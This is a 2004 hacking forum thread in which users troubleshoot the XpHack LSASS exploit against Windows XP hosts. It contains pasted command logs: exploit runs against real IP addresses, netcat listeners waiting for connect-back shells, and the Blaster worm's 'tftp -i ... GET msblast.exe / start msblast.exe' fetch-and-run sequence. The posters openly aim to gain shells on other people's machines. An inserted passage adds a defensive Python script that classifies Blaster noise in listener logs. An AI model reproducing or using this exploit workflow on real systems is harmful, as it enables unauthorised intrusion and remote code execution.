EXPLOiTED
May 18 2004, 03:15 AM
Problem: I read the previous thread on this. I get this when I try (if it even works):
[10:07:31pm] [MERKiN] listening on [any] 4444 ...
[10:07:31pm] [MERKiN] connect to [xxx] from xxx.xxx.xxx.xxx [12.75.84.76] 3433
[10:07:31pm] [MERKiN] tftp -i 12.75.84.76 GET msblast.exe
[10:07:31pm] [MERKiN] start msblast.exe
[10:07:31pm] [MERKiN] msblast.exe
Then it goes back to my CMD line. That was the older XPHack.exe, compiled straight from the site. Now I understand that someone (forget the name, sorry to whomever you are) compiled a new one. OK cool, downloaded it, nothing. With my netcat it's not letting me type in 0 victim port ip.
My nc.cmd is [ nc.exe -l -v -p 65000 ] and that's it. I have used the first exploit of this nature, and uh... it worked. Just ran lsass.exe offset victim port connect back, and had a netcat window open as well... Any insight on this? I'm stumped.
Anarchiste
May 18 2004, 09:49 AM
Your netcat listens on port 4444, and you wait for some connect-back shell. But the MSBlast worm scans ranges for port 4444 open to infect them, because infected boxes have a shell on this port. So make the test: just listen on that port one night and you will see many msblast connections. The XPHACK lsass exploit works, and returns a shell.
So have a nice hack
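One way to tell this Blaster noise apart from a genuine connect-back, as an added example that is not part of the thread: a small Python classifier that reads a captured listener session shaped like the ones pasted in this thread, picks out the tftp/start command sequence, and reports whether the peer sits in the listener's own subnet (the subnet and the sample session are constructed assumptions).

```python
import ipaddress
import re

# Constructed sample of a netcat listener session (not taken from the thread),
# shaped like the output quoted above: an infected host pushing its commands.
SAMPLE_SESSION = """listening on [any] 4444 ...
connect to [10.0.5.20] from host.example [10.0.5.77] 3892
tftp -i 10.0.5.77 GET msblast.exe
start msblast.exe
msblast.exe
"""

CONNECT_RE = re.compile(r"connect to \[([\d.]+)\] from \S+ \[([\d.]+)\] (\d+)")
TFTP_RE = re.compile(r"^tftp\s+-i\s+([\d.]+)\s+GET\s+(\S+)", re.IGNORECASE)
START_RE = re.compile(r"^start\s+(\S+)", re.IGNORECASE)


def classify_session(text, local_net="10.0.5.0/24"):
    """Describe whether a captured listener session looks like Blaster worm
    noise (tftp fetch plus start of msblast.exe) rather than a real shell.
    local_net is the listener's own subnet (an assumed value)."""
    net = ipaddress.ip_network(local_net)
    result = {"peer": None, "listener": None, "tftp_server": None,
              "fetched": None, "started": None, "verdict": "unknown"}
    for line in text.splitlines():
        line = line.strip()
        m = CONNECT_RE.search(line)
        if m:  # netcat's own banner: which address connected to us
            result["listener"], result["peer"] = m.group(1), m.group(2)
            continue
        m = TFTP_RE.match(line)
        if m:  # the worm tells the "victim" where to fetch its binary from
            result["tftp_server"], result["fetched"] = m.group(1), m.group(2).lower()
            continue
        m = START_RE.match(line)
        if m:
            result["started"] = m.group(1).lower()
    worm = result["fetched"] == "msblast.exe" and result["started"] == "msblast.exe"
    if worm:
        result["verdict"] = "blaster_infected_peer"
        # Blaster points the victim back at the infected host itself
        result["tftp_from_peer"] = result["tftp_server"] == result["peer"]
        inside = result["peer"] and ipaddress.ip_address(result["peer"]) in net
        result["peer_in_local_net"] = bool(inside)
    elif result["peer"]:
        result["verdict"] = "connection_no_worm_commands"
    return result
```

Run it against a night's worth of saved listener output and anything tagged blaster_infected_peer is a host on your own range that still needs patching and cleaning, not a result of the exploit.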
EXPLOiTED
May 19 2004, 11:42 PM
look at this...
C:\RPC3>xp 128.210.124.155 4444
-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----
Connecting...Good
Getting a shell...OoOoOps shell!!
C:\RPC3>nc.exe -l -v -p 4444
listening on [any] 4444 ...
connect to [12.x.x.x] from xxx.xxx.xxx.xxx [12.x.x.x] 3892
tftp -i 12.75.78.56 GET msblast.exe
start msblast.exe
msblast.exe
C:\RPC3>
Thing is... the 'to' IP is not right at all. It turns out it's an IP in my network... Shall I use another port? This won't stop happening; I know port 4444 is used by msblast.exe.
Thx again
EXPLOiTED
Flowby
May 20 2004, 02:09 AM
Lol, that happened to me too.....
Strange, a lot of us use 4444, he he.
Strange this Blaster is still out, man?
EXPLOiTED
May 20 2004, 04:07 AM
Well, the thing is, nothing is actually downloaded. It looks fake in my opinion. It "downloads" from a person in your range. So dismiss the msblaster worm download, for it is never downloaded. I'm just trying to find out why I cannot gain a shell. Using the 2000 exploit, I can do it. If there were an "XpHack2.exe" that had the same format as lsasser.exe, which was
lsasstest.exe offset <target> bindport <your ip>
and have NC running on, oh, say port 65000, it would work... If I can be of any help, drop me a line.
EXPLOiT